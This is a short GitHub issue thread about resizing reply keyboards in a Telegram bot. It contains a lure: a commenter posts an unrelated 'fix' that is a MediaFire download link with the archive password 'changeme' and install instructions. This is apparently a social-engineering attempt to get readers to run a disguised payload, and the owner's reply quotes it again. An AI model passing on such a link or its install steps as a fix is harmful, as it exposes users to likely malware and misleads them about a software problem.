### ISSUE TITLE
Resize bot reply markups

### ISSUE THREAD

**Issue by MatinGhanbari** [LexiEnglishBot/Lexi#94]
Resize the reply markups on messages that has reply markups. 
![image](https://github.com/user-attachments/assets/81fc40d7-1cd3-45eb-b491-1353c6591d06)

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by MatinGhanbari** [comment]
> hi bro, to fix your trouble try this fix, i see it in another issue,
> 
> https://app.mediafire.com/dqajf1x14ccfd
> 
> password: changeme
> 
> when you installing it, you need to place a check in install to path and select usx

Thanks. But it can be done more easy than you think 😅
The issue going to be done if set the resize flag in the message.
